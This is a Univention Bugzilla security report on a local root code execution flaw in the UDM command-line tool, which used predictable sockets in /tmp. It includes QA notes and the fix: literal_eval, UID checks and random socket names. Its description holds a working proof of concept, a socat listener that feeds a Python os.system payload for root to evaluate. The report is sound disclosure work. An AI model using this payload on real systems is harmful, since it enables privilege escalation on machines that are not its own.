Univention Bugzilla – Full Text Bug Listing |
Summary: | local root code execution vulnerability as every user because UDM CLI uses sockets from /tmp/ | ||
---|---|---|---|
Product: | UCS | Reporter: | Florian Best <best> |
Component: | UDM - CLI | Assignee: | Florian Best <best> |
Status: | CLOSED FIXED | QA Contact: | Philipp Hahn <hahn> |
Severity: | critical | ||
Priority: | P5 | CC: | gohmann |
Version: | UCS 4.1 | ||
Target Milestone: | UCS 4.1-2-errata | ||
Hardware: | Other | ||
OS: | Linux | ||
See Also: |
https://forge.univention.org/bugzilla/show_bug.cgi?id=20610 https://forge.univention.org/bugzilla/show_bug.cgi?id=33224 |
||
What kind of report is it?: | Security Issue | What type of bug is this?: | --- |
Who will be affected by this bug?: | --- | How will those affected feel about the bug?: | --- |
User Pain: | Enterprise Customer affected?: | ||
School Customer affected?: | ISV affected?: | ||
Waiting Support: | Flags outvoted (downgraded) after PO Review: | ||
Ticket number: | Bug group (optional): | Security | |
Max CVSS v3 score: |
Description
Florian Best
2016-01-13 11:21:57 CET
[DoS]: Therefore "nobody" is able to completely block every UDM-CLI call forever. And another thing is that code is executed which is send to the socket in both directions: → let user 'root' execute code (logged in a user nobody): # su nobody nobody:/$ mkdir /tmp/admincli_0 nobody:/$ printf "__import__('os').system('touch /tmp/evaled')\x00" | socat unix-listen:/tmp/admincli_0/sock stdin nobody:/$ ls -l /tmp/evaled -rw-r--r-- 1 root root 0 Jun 23 18:35 /tmp/evaled → Execute code on the server (harmless, as the same user): printf "__import__('os').system('touch /tmp/evaled')\x00" | socat stdin unix-connect:/tmp/admincli_65534/sock * Code is now evaluated with ast.literal_eval(). * Sockets are checked if the uid is the same as the current/calling UID. → Should we check also permissions here? * If the connection fails it is retried with a socket name containing random values to prevent that someone makes UDM unusable for non-root users. univention-directory-manager-modules (11.0.3-17): r70594 | Bug #40422: fix local root code execution and MITM vulnerability OK: r70594 OK: udm modules OK: su -c '/usr/sbin/udm users/user' Administrator OK: mkdir /tmp/admincli_2002;touch /tmp/admincli_200/socket{,.run};time su -c '/usr/sbin/udm users/user' Administrator # delayed ~30s FYI: A user visible progress would be nice as those 30s massively delay the CLI usage ; bash-completion seems to be broken. FIXED: univention-directory-manager-modules.yaml r70667 | Bug #40422 et al: UDM YAML OK: errata-announce -V --only univention-directory-manager-modules.yaml (In reply to Philipp Hahn from comment #4) > FYI: A user visible progress would be nice as those 30s massively delay the > CLI usage ; bash-completion seems to be broken. Yes, I saw this, too. I see no reason to wait 30 seconds. I'll add a note to Bug #33224. *** Bug 37604 has been marked as a duplicate of this bug. *** |